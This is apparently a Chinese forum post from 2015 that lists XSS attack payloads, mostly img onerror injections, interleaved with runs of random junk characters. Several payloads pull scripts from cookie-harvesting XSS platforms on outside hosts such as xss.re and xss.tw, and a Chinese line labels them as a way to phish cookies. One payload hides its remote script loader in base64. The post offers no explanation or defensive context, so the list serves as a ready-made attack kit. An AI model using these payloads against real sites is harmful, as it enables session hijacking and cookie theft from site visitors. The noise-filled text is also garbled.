<img src='non-exist.jpg'onerror="alert('xss')">
1 c+ U5 M# r- E+ P" K, B5 R" `. c5 [<img src=# onerror=alert(123)>
% i- q) [9 U e! C$ f<img src=# onerror=alert(document.cookie)>
+ \5 S3 b; B7 u下面是利用平台钓cookie的7 L' K( V$ w' F/ k0 S2 v8 M
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
6 z# Y' D( G' b; O, K! M
3 K, t5 o$ d8 f9 V1 U) s0 Y. h* ~* l# S6 P, [/ S$ m1 t
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>3 H% E* U5 _) S- O
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img> R* P' Q* X& m# i' J
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
7 ^8 E W/ d; z) X<img src=1 onerror=jQuery.getScript("//xss.re/974")> u( P1 N) b& v( ~# u9 l
<img src="#">
& Z, ^" ~. ~ M! X& r" i<img src="#">8 L* |' c x5 s2 A/ n3 E0 ]( _
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
+ V! y4 ?+ O; s8 D' N* ]+ Z<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
4 S3 g7 r! C8 O3 j i1 f! F# d<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
+ [" F+ T( I1 \+ ~<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>/ Q7 ^) }( S V
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
- s) j& n2 ~7 t' {<img src=x width="0" height="0"></img>- t3 q& L% H ] O! t9 l
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
8 w$ q: }' r- W<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
/ U% v& U' ^& ]+ B* Y |
发表于 2015-10-18 14:33:54
收藏
支持
反对